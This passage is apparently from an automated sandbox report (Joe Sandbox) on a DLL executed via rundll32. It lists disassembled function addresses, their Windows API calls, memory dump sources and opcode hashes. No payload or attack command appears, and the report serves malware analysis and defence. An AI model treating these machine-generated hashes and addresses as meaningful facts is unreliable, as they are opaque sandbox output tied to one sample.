                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                      • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      • Opcode ID: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction ID: d8da987412a92661894f53f4219df58ee2caf7a71088449fd518a1fce9205d0f
                                                                                                                      • Opcode Fuzzy Hash: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction Fuzzy Hash: 67214770905189DBEB09DB98C960BAEBB75EF01308F18469DE0526B3C2CB392B10C716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                      • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                      • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      • Opcode ID: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction ID: 1b2bd9fb6b1df5d5f83e0c816a53a5057bef739e6a7686bc2bbf7ce06708db6b
                                                                                                                      • Opcode Fuzzy Hash: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction Fuzzy Hash: 06F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction ID: 1a39fa9d0276ee84c07bd3808c66cb0226ddbd666de5b2da3b26845cb98b16c2
                                                                                                                      • Opcode Fuzzy Hash: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction Fuzzy Hash: 2A414A34900204CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction ID: 27039e4540ef9999db1a35b9c590bf271b8d22289eaaf12d3c9627bdabeff3d4
                                                                                                                      • Opcode Fuzzy Hash: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction Fuzzy Hash: CE416A72A00258DBEB30CFA4CC81BDE77A8EF09350F614119E949EB281EB70D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                      • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                      • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                      • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      • Opcode ID: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction ID: 76e901679f7557a4ddbab0066ed26c1097b584537e780c29b8b672eedf99bc1e
                                                                                                                      • Opcode Fuzzy Hash: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction Fuzzy Hash: CC41C275D00215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
